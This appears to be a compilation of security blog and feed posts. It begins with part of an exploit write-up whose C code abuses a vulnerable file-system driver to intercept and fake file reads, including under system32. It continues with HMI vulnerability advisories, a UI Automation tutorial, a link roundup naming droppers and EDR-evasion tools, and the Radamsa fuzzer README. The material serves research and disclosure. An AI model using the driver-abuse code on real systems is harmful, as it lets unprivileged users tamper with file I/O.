        FlagsDescs[1].Function = 4; //IRP_MJ_WRITE
        FlagsDescs[1].RFlags = (RequestFlags)(RF_PassDown | RF_CallPreHandler);
    }
    CtlSetStreamFlags(hDevice, &IOEntry->Ctrl, FlagsDescs, 2);

    CtlUnwaitRequest(hDevice, &IOEntry->Ctrl, CurrEntry, RF_PassDown);

    break;
}
case 0x3: //IRP_MJ_READ
case 0x1D: //Fast IRP_MJ_READ
{
    PrintEntryInfo("IRP_MJ_READ", IOEntryBuffer, IOEntry);

    DWORD Length = IOEntry->d5;
    PBYTE Buffer = (PBYTE)IOEntry->d6;
    DWORD EntryNameIndex = FileMapping[IOEntry->Ctrl.FileIndex];
    if (IsEqualPathName(&IOEntryBuffer[EntryNameIndex], FakeReadName) == FALSE)
    {
        PrintBuffer(Buffer, Length);
    }
    else
    {
        printf("Faking read buffer with '*' for %ls\n", FakeReadName);
        for (unsigned int i = 0; i < Length; i++)
        {
            Buffer[i] = '*';
        }
        PrintBuffer(Buffer, Length);
        CtlUnwaitRequest(hDevice, &IOEntry->Ctrl, CurrEntry, RF_CompleteRequest);
    }

    break;
}

Fake.png

[Breaking bad]

For the sake of simplicity, all previous examples monitored the ‘c:\tmp’ folder. What if we want to monitor a higher-ranking directory, say, ‘system32’ or ‘system32\config’? Easy as pie! Everything written above works for any directory in the OS; you just need to provide the path name to the CtlCreateMonitoredFolder function. The screenshot shows the output of monitoring the ‘c:\windows\system32’ directory: System32.png

[EOF]

I didn’t reverse all the pre, post, and other handlers of the driver. It actually handles most, if not all, IRP_MJ_XXX requests directed to the file system, granting non-privileged users complete control over file system IO operations.

The vendor was notified about the problem approximately six months ago and has not taken action to address it. I guess they don’t care.

Update: It turns out they eventually did fix it. The vulnerability was discovered ages ago, and while I don’t remember all the details of the exposure process, I recently stumbled upon a CVE entry that describes the vulnerability. Someone, maybe even the vendor, requested the CVE ID. Here it is: https://nvd.nist.gov/vuln/detail/CVE-2020-15518.

Full code and the driver binary are available at the repository.

The Cybersecurity Skills Gap: Time to Step Up with OffSec’s Red Teaming and IoT Learning Paths

The cybersecurity landscape is indeed challenged by a significant skills gap, with reports highlighting the critical shortage of professionals equipped to handle escalating cyber threats. The 2023 Global Cybersecurity Skills Gap Report from Fortinet underscores the urgency of this issue, revealing that a vast majority of organizations are facing more breaches due to a lack of skilled cybersecurity professionals. Specifically, the report found that 86% of decision-makers in cybersecurity recognize that the manpower shortage increases cyber risks for companies. 

OffSec is on a mission to address this critical challenge with its cutting-edge Red Teaming and Internet of Things (IoT) Learning Paths. These in-depth programs transcend generic tutorials, equipping learners with the real-world skills to tackle the complex security vulnerabilities in two of today’s most targeted areas.

... Read more »

The post The Cybersecurity Skills Gap: Time to Step Up with OffSec’s Red Teaming and IoT Learning Paths appeared first on OffSec.

The Power of UI Automation

What if you needed to get a list of all the open browser tabs in some browser? In the (very) old days you might assume that each tab is its own window, so you could find a main browser window (using FindWindow, for example), and then enumerate child windows with EnumChildWindows to locate the tabs. Unfortunately, this approach is destined to fail. Here is a screenshot of WinSpy looking at a main window of Microsoft Edge:

MS Edge showing only two child windows

The title of the main window hints to the existence of 26 tabs, but there are only two child windows and they are not tabs. The inevitable conclusion is that the tabs are not windows at all. They are being “drawn” with some technology that the Win32 windowing infrastructure doesn’t know about nor cares.

How can we get information about those browsing tabs? Enter UI Automation.

UI Automation has been around for many years, starting with the older technology called “Active Accessibility“. This technology is geared towards accessibility while providing rich information that can be consumed by accessibility clients. Although Active Accessibility is still supported for compatibility reasons, a newer technology called UI Automation supersedes it.

UI Automation provides a tree of UI automation elements representing various aspects of a user interface. Some elements represent “true” Win32 windows (have HWND), some represent internal controls like buttons and edit boxes (created with whatever technology), and some elements are virtual (don’t have any graphical aspects), but instead provide “metadata” related to other items.

The UI Automation client API uses COM, where the root object implements the IUIAutomation interface (it has extended interfaces implemented as well). To get the automation object, the following C++ code can be used (we’ll see a C# example later):

CComPtr<IUIAutomation> spUI;
auto hr = spUI.CoCreateInstance(__uuidof(CUIAutomation));
if (FAILED(hr))
	return Error("Failed to create Automation root", hr);

The client automation interfaces are declared in <UIAutomationClient.h>. The code uses the ATL CComPtr<> smart pointers, but any COM smart or raw pointers will do.

With the UI Automation object pointer in hand, several options are available. One is to enumerate the full or part of the UI element tree. To get started, we can obtain a “walker” object by calling IUIAutomation::get_RawViewWalker. From there, we can start enumerating by calling IUIAutomationTreeWalker interface methods, like GetFirstChildElement and GetNextSiblingElement.

Each element, represented by a IUIAutomationElement interface provides a set of properties, some available directly on the interface (e.g. get_CurrentName, get_CurrentClassName, get_CurrentProcessId), while others hide behind a generic method, get_CurrentPropertyValue, where each property has an integer ID, and the result is a VARIANT, to allow for various types of values.

Using this method, the menu item View Automation Tree in WinSpy shows the full automation tree, and you can drill down to any level, while many of the selected element’s properties are shown on the right:

WinSpy automation tree view

If you dig deep enough, you’ll find that MS Edge tabs have a UI automation class name of “EdgeTab”. This is the key to locating browser tabs. (Other browsers may have a different class name). To find tabs, we can enumerate the full tree manually, but fortunately, there is a better way. IUIAutomationElement has a FindAll method that searches for elements based on a set of conditions. The conditions available are pretty flexible – based on some property or properties of elements, which can be combined with And, Or, etc. to get more complex conditions. In our case, we just need one condition – a class name called “EdgeTab”.

First, we’ll create the root object, and the condition (error handling omitted for brevity):

int main() {
	::CoInitialize(nullptr);

	CComPtr<IUIAutomation> spUI;
	auto hr = spUI.CoCreateInstance(__uuidof(CUIAutomation));

	CComPtr<IUIAutomationCondition> spCond;
	CComVariant edgeTab(L"EdgeTab");
	spUI->CreatePropertyCondition(UIA_ClassNamePropertyId, edgeTab, &spCond);

We have a single condition for the class name property, which has an ID defined in the automation headers. Next, we’ll fire off the search from the root element (desktop):

CComPtr<IUIAutomationElementArray> spTabs;
CComPtr<IUIAutomationElement> spRoot;
spUI->GetRootElement(&spRoot);
hr = spRoot->FindAll(TreeScope_Descendants, spCond, &spTabs);

All that’s left to do is harvest the results:

int count = 0;
spTabs->get_Length(&count);
for (int i = 0; i < count; i++) {
	CComPtr<IUIAutomationElement> spTab;
	spTabs->GetElement(i, &spTab);
	CComBSTR name;
	spTab->get_CurrentName(&name);
	int pid;
	spTab->get_CurrentProcessId(&pid);
	printf("%2d PID %6d: %ws\n", i + 1, pid, name.m_str);
}

Try it!

.NET Code

A convenient Nuget package called Interop.UIAutomationClient.Signed provides wrappers for the automation API for .NET clients. Here is the same search done in C# after adding the Nuget package reference:

static void Main(string[] args) {
    const int ClassPropertyId = 30012;
    var ui = new CUIAutomationClass();
    var cond = ui.CreatePropertyCondition(ClassPropertyId, "EdgeTab");
    var tabs = ui.GetRootElement().FindAll(TreeScope.TreeScope_Descendants, cond);
    for (int i = 0; i < tabs.Length; i++) {
        var tab = tabs.GetElement(i);
        Console.WriteLine($"{i + 1,2} PID {tab.CurrentProcessId,6}: {tab.CurrentName}");
    }
}

More Automation

There is a lot more to UI automation – the word “automation” implies some more control. One capability of the API is providing various notifications when certain aspects of elements change. Examples include the IUIAutomation methods AddAutomationEventHandler, AddFocusChangedEventHandler, AddPropertyChangedEventHandler, and AddStructureChangedEventHandler.

More specific information on elements (and some control) is also available with more specific interfaces related to controls, such as IUIAutomationTextPattern, IUIAutomationTextRange, and manu more.

Happy automation!

CVE-2024-25138

CWE-256: Plaintext Storage of a Password

In Automation-Direct C-MORE EA9 HMI credentials used by the platform are stored as plain text on the device.

AutomationDirect recommends that users update C-MORE EA9 HMI to V6.78

Affected versions:

  • C-MORE EA9 HMI EA9-T6CL: Version 6.77 and prior
  • C-MORE EA9 HMI EA9-T7CL: Version 6.77 and prior
  • C-MORE EA9 HMI EA0-T7CL-R: Version 6.77 and prior
  • C-MORE EA9 HMI EA9-T8CL: Version 6.77 and prior
  • C-MORE EA9 HMI EA9-T10CL: Version 6.77 and prior
  • C-MORE EA9 HMI EA9-T10WCL: Version 6.77 and prior
  • C-MORE EA9 HMI EA9-T12CL: Version 6.77 and prior
  • C-MORE EA9 HMI EA9-T15CL: Version 6.77 and prior
  • C-MORE EA9 HMI EA9-T15CL-R: Version 6.77 and prior
  • C-MORE EA9 HMI EA9-RHMI: Version 6.77 and prior
  • C-MORE EA9 HMI EA9-PGMSW: Version 6.77 and prior

CVE-2024-25137

CWE-121: Stack-based Buffer Overflow

In Automation-Direct C-MORE EA9 HMI there is a program that copies a buffer of a size controlled by the user into a limited sized buffer on the stack which leads to a stack overflow. The result of this stack-based buffer overflow will lead to a denial-of-service conditions.

AutomationDirect recommends that users update C-MORE EA9 HMI to V6.78

Affected versions:

  • C-MORE EA9 HMI EA9-T6CL: Version 6.77 and prior
  • C-MORE EA9 HMI EA9-T7CL: Version 6.77 and prior
  • C-MORE EA9 HMI EA0-T7CL-R: Version 6.77 and prior
  • C-MORE EA9 HMI EA9-T8CL: Version 6.77 and prior
  • C-MORE EA9 HMI EA9-T10CL: Version 6.77 and prior
  • C-MORE EA9 HMI EA9-T10WCL: Version 6.77 and prior
  • C-MORE EA9 HMI EA9-T12CL: Version 6.77 and prior
  • C-MORE EA9 HMI EA9-T15CL: Version 6.77 and prior
  • C-MORE EA9 HMI EA9-T15CL-R: Version 6.77 and prior
  • C-MORE EA9 HMI EA9-RHMI: Version 6.77 and prior
  • C-MORE EA9 HMI EA9-PGMSW: Version 6.77 and prior

CVE-2024-25136

CWE-22: Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')

There is a function in Automation-Direct C-MORE EA9 HMI that allows an attacker to send a relative path in the URL without proper sanitizing of the content.

AutomationDirect recommends that users update C-MORE EA9 HMI to V6.78

Affected versions:

  • C-MORE EA9 HMI EA9-T6CL: Version 6.77 and prior
  • C-MORE EA9 HMI EA9-T7CL: Version 6.77 and prior
  • C-MORE EA9 HMI EA0-T7CL-R: Version 6.77 and prior
  • C-MORE EA9 HMI EA9-T8CL: Version 6.77 and prior
  • C-MORE EA9 HMI EA9-T10CL: Version 6.77 and prior
  • C-MORE EA9 HMI EA9-T10WCL: Version 6.77 and prior
  • C-MORE EA9 HMI EA9-T12CL: Version 6.77 and prior
  • C-MORE EA9 HMI EA9-T15CL: Version 6.77 and prior
  • C-MORE EA9 HMI EA9-T15CL-R: Version 6.77 and prior
  • C-MORE EA9 HMI EA9-RHMI: Version 6.77 and prior
  • C-MORE EA9 HMI EA9-PGMSW: Version 6.77 and prior

AutoWLAN - Run A Portable Access Point On A Raspberry Pi Making Use Of Docker Containers


This project will allow you run a portable access point on a Raspberry Pi making use of Docker containers.

Further reference and explanations:

https://fwhibbit.es/en/automatic-access-point-with-docker-and-raspberry-pi-zero-w

Tested on Raspberry Pi Zero W.


Access point configurations

You can customize the network password and other configurations on files at confs/hostapd_confs/. You can also add your own hostapd configuration files here.

Management using plain docker

Add --rm for volatile containers.

Create and run a container with default (Open) configuration (stop with Ctrl+C)
docker run --name autowlan_open --cap-add=NET_ADMIN --network=host  autowlan
Create and run a container with WEP configuration (stop with Ctrl+C)
docker run --name autowlan_wep --cap-add=NET_ADMIN --network=host -v $(pwd)/confs/hostapd_confs/wep.conf:/etc/hostapd/hostapd.conf autowlan
Create and run a container with WPA2 configuration (stop with Ctrl+C)
docker run --name autowlan_wpa2 --cap-add=NET_ADMIN --network=host -v $(pwd)/confs/hostapd_confs/wpa2.conf:/etc/hostapd/hostapd.conf autowlan
Stop a running container
docker stop autowlan_{open|wep|wpa2}

Management using docker-compose

Create and run container (stop with Ctrl+C)
docker-compose -f <fichero_yml> up
Create and run container in the background
docker-compose -f <fichero_yml> up  -d
Stop a container in the background
docker-compose -f <fichero_yml> down
Read logs of a container in the background
docker-compose -f <fichero_yml> logs


Last Week in Security (LWiS) - 2024-03-25

Last Week in Security is a summary of the interesting cybersecurity news, techniques, tools and exploits from the past week. This post covers 2024-03-18 to 2024-03-25.

News

  • Unveiling malware behavior trends - Analyzing a Windows dataset of over 100,000 malicious files by Elastic Security Labs.
  • Introducing STAR-FS The Bank of England announced the introduction of a new regulatory framework, STAR-FS, to support the financial sector in its cyber resilience operations.
  • GoFetch - A new vulnerability baked into Apple's M-series of chips that allows attackers (and/or userspace applications) to extract secret keys from Macs. It looks like there are mitigation flags that can be set to mitigate this for sensitive cryptographic calls. Time will tell if they are effective/implemented.
  • The US Department of Justice is suing Apple — read the full lawsuit here - Will this lead to a more open iOS? Maybe, but it will be years before anything (if anything) changes.

Techniques and Write-ups

Tools and Exploits

  • WhoIsWho - Alternatives to the command whoami
  • dropper- Project that generates Malicious Office Macro Enabled Dropper for DLL SideLoading and Embed it in Lnk file to bypass MOTW
  • Perfect DLL Proxy - Perfect DLL Proxying using forwards with absolute paths. [I'm partial to Spartacus]
  • Jigsaw - Hide shellcode by shuffling bytes into a random array and reconstruct at runtime
  • IoDllProxyLoad - DLL proxy load example using the Windows thread pool API, I/O completion callback with named pipes, and C++/assembly
  • OpenTIDE - Open Threat Informed Detection Engineering is the European Commission DIGIT.S2 (Security Operations) open source initiative to build a rich ecosystem of tooling and data supporting Cyber Threat Detections.
  • HttpRemotingObjRefLeak - Additional resources for leaking and exploiting ObjRefs via HTTP .NET Remoting CVE-2024-29059.
  • Pwned by the Mail Carrier - Compromising exchange with some defensive guidance on adjusting ACEs to limit Exchange's AD permissions and establishing security boundaries for Tier Zero assets. Jonas is on a tear lately.
  • Another Dll Proxying Tool - DLL proxying for lazy people
  • nimvoke - Indirect syscalls + DInvoke made simple.
  • ActionsCacheBlasting - Proof-of-concept code for research into GitHub Actions Cache poisoning.
  • CVE-2023-36424 - Windows Kernel Pool (clfs.sys) Corruption Privilege Escalation.

New to Me and Miscellaneous

This section is for news, techniques, write-ups, tools, and off-topic items that weren't released last week but are new to me. Perhaps you missed them too!

  • SO-CON 2024 - SO-CON 2024 presentations released. Videos coming soon!
  • The Top 100+ Developer Tools 2023 - Looking for a research target inspiration? "This year we analyzed well over 12 million data points shared by you - the StackShare community - to bring you these rankings."
  • Devika - Devika is an Agentic AI Software Engineer that can understand high-level human instructions, break them down into steps, research relevant information, and write code to achieve the given objective. Devika aims to be a competitive open-source alternative to Devin by Cognition AI.
  • VoiceCraft: Zero-Shot Speech Editing and Text-to-Speech in the Wild - VoiceCraft is a token infilling neural codec language model, that achieves state-of-the-art performance on both speech editing and zero-shot text-to-speech (TTS) on in-the-wild data including audiobooks, internet videos, and podcasts. The model weights aren't out yet but should be by the end of the month. This is going to make vishing deadly.
  • lumentis - AI powered one-click comprehensive docs from transcripts and text.
  • Cobalt Strike Resources - Various resources to enhance Cobalt Strike's functionality and its ability to evade antivirus/EDR detection.
  • bincapz - Enumerate binary capabilities, including malicious behaviors.
  • Mutual TLS (mTLS) Go client - How to build an mTLS Go client that uses the Windows certificate store.
  • Windows vs Linux Loader Architecture - Side-by-side comparison of the Windows and Linux (GNU) Loaders.
  • Twikit - Simple API wrapper to interact with twitter's unofficial API. You can log in to Twitter using your account username, email address and password and use most features on Twitter, such as posting and retrieving tweets, liking and following users. Curious on how long this will last.
  • tracecat - 😼 The AI-native, open source alternative to Tines / Splunk SOAR.

Techniques, tools, and exploits linked in this post are not reviewed for quality or safety. Do your own research and testing.

IT-Notfallkarte

Ein Notfall und was ist jetzt zu tun?

Notfallkarten geben uns in unsicheren oder kritischen Situationen eine Richtline. Durch die IT-NOTFALLKARTE der HanseSecure erhalten alle Nutzer eine kompakte Handlungsanweisung.

Außerdem wird die Security Awareness des Unternehmens unimttelbar erhöht. Durch das begleitete Handeln erfahren sie Sicherheit und schützen sich und andere direkt vor weiteren fehlerhaften Entscheidungen und können die Ausweitung der Konsequenzen verhindern.

Gerade IT- Notfälle benötigen eine direkte und begleitete Handlungsrichtline, um so weitreichende Folgen zu verhindern. Darüber hinaus gilt es die Angst vor Fehlern zu nehmen, zu sensibilisieren und die Meldung von Auffälligkeiten zu bestärken. Die IT-NOTFALLKARTE sollte daher an in jedem Büro sichtbar angebracht und eine erklärende Einführung gegeben werden.

Der Beitrag IT-Notfallkarte erschien zuerst auf HanseSecure GmbH.

Horizon3.ai Garners Spot in 2024 CRN® Partner Program Guide

Business Wire 03/25/2024

Horizon3.ai, a pioneer in autonomous security solutions, has been honored by CRN®, a brand of The Channel Company, with inclusion in its 2024 Partner Program Guide. This annual guide provides essential information to solution providers exploring technology vendor partner programs…

Read the entire article here

The post Horizon3.ai Garners Spot in 2024 CRN® Partner Program Guide appeared first on Horizon3.ai.

Radamsa - A General-Purpose Fuzzer


Radamsa is a test case generator for robustness testing, a.k.a. a fuzzer. It is typically used to test how well a program can withstand malformed and potentially malicious inputs. It works by reading sample files of valid data and generating interestringly different outputs from them. The main selling points of radamsa are that it has already found a slew of bugs in programs that actually matter, it is easily scriptable and, easy to get up and running.


Nutshell:

 $ # please please please fuzz your programs. here is one way to get data for it:
$ sudo apt-get install gcc make git wget
$ git clone https://gitlab.com/akihe/radamsa.git && cd radamsa && make && sudo make install
$ echo "HAL 9000" | radamsa

What the Fuzz

Programming is hard. All nontrivial programs have bugs in them. What's more, even the simplest typical mistakes are in some of the most widely used programming languages usually enough for attackers to gain undesired powers.

Fuzzing is one of the techniques to find such unexpected behavior from programs. The idea is simply to subject the program to various kinds of inputs and see what happens. There are two parts in this process: getting the various kinds of inputs and how to see what happens. Radamsa is a solution to the first part, and the second part is typically a short shell script. Testers usually have a more or less vague idea what should not happen, and they try to find out if this is so. This kind of testing is often referred to as negative testing, being the opposite of positive unit- or integration testing. Developers know a service should not crash, should not consume exponential amounts of memory, should not get stuck in an infinite loop, etc. Attackers know that they can probably turn certain kinds of memory safety bugs into exploits, so they fuzz typically instrumented versions of the target programs and wait for such errors to be found. In theory, the idea is to counterprove by finding a counterexample a theorem about the program stating that for all inputs something doesn't happen.

There are many kinds of fuzzers and ways to apply them. Some trace the target program and generate test cases based on the behavior. Some need to know the format of the data and generate test cases based on that information. Radamsa is an extremely "black-box" fuzzer, because it needs no information about the program nor the format of the data. One can pair it with coverage analysis during testing to likely improve the quality of the sample set during a continuous test run, but this is not mandatory. The main goal is to first get tests running easily, and then refine the technique applied if necessary.

Radamsa is intended to be a good general purpose fuzzer for all kinds of data. The goal is to be able to find issues no matter what kind of data the program processes, whether it's xml or mp3, and conversely that not finding bugs implies that other similar tools likely won't find them either. This is accomplished by having various kinds of heuristics and change patterns, which are varied during the tests. Sometimes there is just one change, sometimes there a slew of them, sometimes there are bit flips, sometimes something more advanced and novel.

Radamsa is a side-product of OUSPG's Protos Genome Project, in which some techniques to automatically analyze and examine the structure of communication protocols were explored. A subset of one of the tools turned out to be a surprisingly effective file fuzzer. The first prototype black-box fuzzer tools mainly used regular and context-free formal languages to represent the inferred model of the data.

Requirements

Supported operating systems: * GNU/Linux * OpenBSD * FreeBSD * Mac OS X * Windows (using Cygwin)

Software requirements for building from sources: * gcc / clang * make * git * wget

Building Radamsa

 $ git clone https://gitlab.com/akihe/radamsa.git
$ cd radamsa
$ make
$ sudo make install # optional, you can also just grab bin/radamsa
$ radamsa --help

Radamsa itself is just a single binary file which has no external dependencies. You can move it where you please and remove the rest.

Fuzzing with Radamsa

This section assumes some familiarity with UNIX scripting.

Radamsa can be thought as the cat UNIX tool, which manages to break the data in often interesting ways as it flows through. It has also support for generating more than one output at a time and acting as a TCP server or client, in case such things are needed.

Use of radamsa will be demonstrated by means of small examples. We will use the bc arbitrary precision calculator as an example target program.

In the simplest case, from scripting point of view, radamsa can be used to fuzz data going through a pipe.

 $ echo "aaa" | radamsa
aaaa

Here radamsa decided to add one 'a' to the input. Let's try that again.

 $ echo "aaa" | radamsa
ːaaa

Now we got another result. By default radamsa will grab a random seed from /dev/urandom if it is not given a specific random state to start from, and you will generally see a different result every time it is started, though for small inputs you might see the same or the original fairly often. The random state to use can be given with the -s parameter, which is followed by a number. Using the same random state will result in the same data being generated.

 $ echo "Fuzztron 2000" | radamsa --seed 4
Fuzztron 4294967296

This particular example was chosen because radamsa happens to choose to use a number mutator, which replaces textual numbers with something else. Programmers might recognize why for example this particular number might be an interesting one to test for.

You can generate more than one output by using the -n parameter as follows:

 $ echo "1 + (2 + (3 + 4))" | radamsa --seed 12 -n 4
1 + (2 + (2 + (3 + 4?)
1 + (2 + (3 +?4))
18446744073709551615 + 4)))
1 + (2 + (3 + 170141183460469231731687303715884105727))

There is no guarantee that all of the outputs will be unique. However, when using nontrivial samples, equal outputs tend to be extremely rare.

What we have so far can be used to for example test programs that read input from standard input, as in

 $ echo "100 * (1 + (2 / 3))" | radamsa -n 10000 | bc
[...]
(standard_in) 1418: illegal character: ^_
(standard_in) 1422: syntax error
(standard_in) 1424: syntax error
(standard_in) 1424: memory exhausted
[hang]

Or the compiler used to compile Radamsa:

 $ echo '((lambda (x) (+ x 1)) #x124214214)' | radamsa -n 10000 | ol
[...]
> What is 'ó µ'?
4901126677
> $

Or to test decompression:

 $ gzip -c /bin/bash | radamsa -n 1000 | gzip -d > /dev/null

Typically however one might want separate runs for the program for each output. Basic shell scripting makes this easy. Usually we want a test script to run continuously, so we'll use an infinite loop here:

 $ gzip -c /bin/bash > sample.gz
$ while true; do radamsa sample.gz | gzip -d > /dev/null; done

Notice that we are here giving the sample as a file instead of running Radamsa in a pipe. Like cat Radamsa will by default write the output to stdout, but unlike cat when given more than one file it will usually use only one or a few of them to create one output. This test will go about throwing fuzzed data against gzip, but doesn't care what happens then. One simple way to find out if something bad happened to a (simple single-threaded) program is to check whether the exit value is greater than 127, which would indicate a fatal program termination. This can be done for example as follows:

 $ gzip -c /bin/bash > sample.gz
$ while true
do
radamsa sample.gz > fuzzed.gz
gzip -dc fuzzed.gz > /dev/null
test $? -gt 127 && break
done

This will run for as long as it takes to crash gzip, which hopefully is no longer even possible, and the fuzzed.gz can be used to check the issue if the script has stopped. We have found a few such cases, the last one of which took about 3 months to find, but all of them have as usual been filed as bugs and have been promptly fixed by the upstream.

One thing to note is that since most of the outputs are based on data in the given samples (standard input or files given at command line) it is usually a good idea to try to find good samples, and preferably more than one of them. In a more real-world test script radamsa will usually be used to generate more than one output at a time based on tens or thousands of samples, and the consequences of the outputs are tested mostly in parallel, often by giving each of the output on command line to the target program. We'll make a simple such script for bc, which accepts files from command line. The -o flag can be used to give a file name to which radamsa should write the output instead of standard output. If more than one output is generated, the path should have a %n in it, which will be expanded to the number of the output.

 $ echo "1 + 2" > sample-1
$ echo "(124 % 7) ^ 1*2" > sample-2
$ echo "sqrt((1 + length(10^4)) * 5)" > sample-3
$ bc sample-* < /dev/null
3
10
5
$ while true
do
radamsa -o fuzz-%n -n 100 sample-*
bc fuzz-* < /dev/null
test $? -gt 127 && break
done

This will again run up to obviously interesting times indicated by the large exit value, or up to the target program getting stuck.

In practice many programs fail in unique ways. Some common ways to catch obvious errors are to check the exit value, enable fatal signal printing in kernel and checking if something new turns up in dmesg, run a program under strace, gdb or valgrind and see if something interesting is caught, check if an error reporter process has been started after starting the program, etc.

Output Options

The examples above all either wrote to standard output or files. One can also ask radamsa to be a TCP client or server by using a special parameter to -o. The output patterns are:

-o argument meaning example
:port act as a TCP server in given port # radamsa -o :80 -n inf samples/*.http-resp
ip:port connect as TCP client to port of ip $ radamsa -o 127.0.0.1:80 -n inf samples/*.http-req
- write to stdout $ radamsa -o - samples/*.vt100
path write to files, %n is testcase # and %s the first suffix $ radamsa -o test-%n.%s -n 100 samples/*.foo

Remember that you can use e.g. tcpflow to record TCP traffic to files, which can then be used as samples for radamsa.

Related Tools

A non-exhaustive list of free complementary tools:

  • GDB (http://www.gnu.org/software/gdb/)
  • Valgrind (http://valgrind.org/)
  • AddressSanitizer (http://code.google.com/p/address-sanitizer/wiki/AddressSanitizer)
  • strace (http://sourceforge.net/projects/strace/)
  • tcpflow (http://www.circlemud.org/~jelson/software/tcpflow/)

A non-exhaustive list of related free tools: * American fuzzy lop (http://lcamtuf.coredump.cx/afl/) * Zzuf (http://caca.zoy.org/wiki/zzuf) * Bunny the Fuzzer (http://code.google.com/p/bunny-the-fuzzer/) * Peach (http://peachfuzzer.com/) * Sulley (http://code.google.com/p/sulley/)

Tools which are intended to improve security are usually complementary and should be used in parallel to improve the results. Radamsa aims to be an easy-to-set-up general purpose shotgun test to expose the easiest (and often severe due to being reachable from via input streams) cracks which might be exploitable by getting the program to process malicious data. It has also turned out to be useful for catching regressions when combined with continuous automatic testing.

Some Known Results

A robustness testing tool is obviously only good only if it really can find non-trivial issues in real-world programs. Being a University-based group, we have tried to formulate some more scientific approaches to define what a 'good fuzzer' is, but real users are more likely to be interested in whether a tool has found something useful. We do not have anyone at OUSPG running tests or even developing Radamsa full-time, but we obviously do make occasional test-runs, both to assess the usefulness of the tool, and to help improve robustness of the target programs. For the test-runs we try to select programs that are mature, useful to us, widely used, and, preferably, open source and/or tend to process data from outside sources.

The list below has some CVEs we know of that have been found by using Radamsa. Some of the results are from our own test runs, and some have been kindly provided by CERT-FI from their tests and other users. As usual, please note that CVE:s should be read as 'product X is now more robust (against Y)'.

CVE program credit
CVE-2007-3641 libarchive OUSPG
CVE-2007-3644 libarchive OUSPG
CVE-2007-3645 libarchive OUSPG
CVE-2008-1372 bzip2 OUSPG
CVE-2008-1387 ClamAV OUSPG
CVE-2008-1412 F-Secure OUSPG
CVE-2008-1837 ClamAV OUSPG
CVE-2008-6536 7-zip OUSPG
CVE-2008-6903 Sophos Anti-Virus OUSPG
CVE-2010-0001 Gzip integer underflow in unlzw
CVE-2010-0192 Acroread OUSPG
CVE-2010-1205 libpng OUSPG
CVE-2010-1410 Webkit OUSPG
CVE-2010-1415 Webkit OUSPG
CVE-2010-1793 Webkit OUSPG
CVE-2010-2065 libtiff found by CERT-FI
CVE-2010-2443 libtiff found by CERT-FI
CVE-2010-2597 libtiff found by CERT-FI
CVE-2010-2482 libtiff found by CERT-FI
CVE-2011-0522 VLC found by Harry Sintonen
CVE-2011-0181 Apple ImageIO found by Harry Sintonen
CVE-2011-0198 Apple Type Services found by Harry Sintonen
CVE-2011-0205 Apple ImageIO found by Harry Sintonen
CVE-2011-0201 Apple CoreFoundation found by Harry Sintonen
CVE-2011-1276 Excel found by Nicolas Grégoire of Agarri
CVE-2011-1186 Chrome OUSPG
CVE-2011-1434 Chrome OUSPG
CVE-2011-2348 Chrome OUSPG
CVE-2011-2804 Chrome/pdf OUSPG
CVE-2011-2830 Chrome/pdf OUSPG
CVE-2011-2839 Chrome/pdf OUSPG
CVE-2011-2861 Chrome/pdf OUSPG
CVE-2011-3146 librsvg found by Sauli Pahlman
CVE-2011-3654 Mozilla Firefox OUSPG
CVE-2011-3892 Theora OUSPG
CVE-2011-3893 Chrome OUSPG
CVE-2011-3895 FFmpeg OUSPG
CVE-2011-3957 Chrome OUSPG
CVE-2011-3959 Chrome OUSPG
CVE-2011-3960 Chrome OUSPG
CVE-2011-3962 Chrome OUSPG
CVE-2011-3966 Chrome OUSPG
CVE-2011-3970 libxslt OUSPG
CVE-2012-0449 Firefox found by Nicolas Grégoire of Agarri
CVE-2012-0469 Mozilla Firefox OUSPG
CVE-2012-0470 Mozilla Firefox OUSPG
CVE-2012-0457 Mozilla Firefox OUSPG
CVE-2012-2825 libxslt found by Nicolas Grégoire of Agarri
CVE-2012-2849 Chrome/GIF OUSPG
CVE-2012-3972 Mozilla Firefox found by Nicolas Grégoire of Agarri
CVE-2012-1525 Acrobat Reader found by Nicolas Grégoire of Agarri
CVE-2012-2871 libxslt found by Nicolas Grégoire of Agarri
CVE-2012-2870 libxslt found by Nicolas Grégoire of Agarri
CVE-2012-2870 libxslt found by Nicolas Grégoire of Agarri
CVE-2012-4922 tor found by the Tor project
CVE-2012-5108 Chrome OUSPG via NodeFuzz
CVE-2012-2887 Chrome OUSPG via NodeFuzz
CVE-2012-5120 Chrome OUSPG via NodeFuzz
CVE-2012-5121 Chrome OUSPG via NodeFuzz
CVE-2012-5145 Chrome OUSPG via NodeFuzz
CVE-2012-4186 Mozilla Firefox OUSPG via NodeFuzz
CVE-2012-4187 Mozilla Firefox OUSPG via NodeFuzz
CVE-2012-4188 Mozilla Firefox OUSPG via NodeFuzz
CVE-2012-4202 Mozilla Firefox OUSPG via NodeFuzz
CVE-2013-0744 Mozilla Firefox OUSPG via NodeFuzz
CVE-2013-1691 Mozilla Firefox OUSPG
CVE-2013-1708 Mozilla Firefox OUSPG
CVE-2013-4082 Wireshark found by cons0ul
CVE-2013-1732 Mozilla Firefox OUSPG
CVE-2014-0526 Adobe Reader X/XI Pedro Ribeiro ([email protected])
CVE-2014-3669 PHP
CVE-2014-3668 PHP
CVE-2014-8449 Adobe Reader X/XI Pedro Ribeiro ([email protected])
CVE-2014-3707 cURL Symeon Paraschoudis
CVE-2014-7933 Chrome OUSPG
CVE-2015-0797 Mozilla Firefox OUSPG
CVE-2015-0813 Mozilla Firefox OUSPG
CVE-2015-1220 Chrome OUSPG
CVE-2015-1224 Chrome OUSPG
CVE-2015-2819 Sybase SQL vah_13 (ERPScan)
CVE-2015-2820 SAP Afaria vah_13 (ERPScan)
CVE-2015-7091 Apple QuickTime Pedro Ribeiro ([email protected])
CVE-2015-8330 SAP PCo agent Mathieu GELI (ERPScan)
CVE-2016-1928 SAP HANA hdbxsengine Mathieu Geli (ERPScan)
CVE-2016-3979 SAP NetWeaver @ret5et (ERPScan)
CVE-2016-3980 SAP NetWeaver @ret5et (ERPScan)
CVE-2016-4015 SAP NetWeaver @vah_13 (ERPScan)
CVE-2016-4015 SAP NetWeaver @vah_13 (ERPScan)
CVE-2016-9562 SAP NetWeaver @vah_13 (ERPScan)
CVE-2017-5371 SAP ASE OData @vah_13 (ERPScan)
CVE-2017-9843 SAP NETWEAVER @vah_13 (ERPScan)
CVE-2017-9845 SAP NETWEAVER @vah_13 (ERPScan)
CVE-2018-0101 Cisco ASA WebVPN/AnyConnect @saidelike (NCC Group)

